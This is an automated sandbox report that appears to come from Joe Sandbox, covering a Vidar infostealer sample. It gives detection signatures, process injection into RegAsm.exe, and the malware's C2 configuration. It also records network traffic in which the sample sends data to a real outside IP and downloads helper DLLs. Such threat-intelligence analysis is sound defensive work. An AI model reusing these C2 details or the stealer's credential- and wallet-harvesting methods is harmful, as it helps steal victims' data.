Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1432048
MD5:	4b46a0105ccb6a18f9872c93f12d06fc
SHA1:	0431e68c03ca35eae0dac613e7e8b9628aa0dc3a
SHA256:	85d635c9d2462f7f97a7d91bb8e0e72eeebf5f394580f6a97a016f2f42f9c29a
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected AntiVM3

Yara detected Vidar

Yara detected Vidar stealer

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4B46A0105CCB6A18F9872C93F12D06FC)

conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7348	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7408	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7408	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7408	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.file.exe.a00018.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.a00018.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.9d0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004117A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	2_2_004117A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406F90 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_00406F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409330 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	2_2_00409330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406F10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_00406F10

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.246.168:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: mozglue.pdbP source: mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: nss3.pdb@ source: nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source:	Binary string: nss3.pdb source: nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.2.dr
Source:	Binary string: mozglue.pdb source: mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E960E FindFirstFileExW,	0_2_009E960E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B1B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401200 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040D4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00416740 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	2_2_00416740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00417800 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00417800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00416F50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00416F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004173C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	2_2_004173C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A660 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040AAE0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040AAE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00416BB0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

2_2_00416BB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199677575543

Source: global traffic

HTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 23.194.234.100 23.194.234.100

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKECAEGDHIECBGHIIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 7973Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 131181Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00404490 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_00404490

Source: global traffic	HTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache

Source: RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: mai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'n equals www.youtube.com (Youtube)

Source: global traffic

DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 278Connection: Keep-AliveCache-Control: no-cache

Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
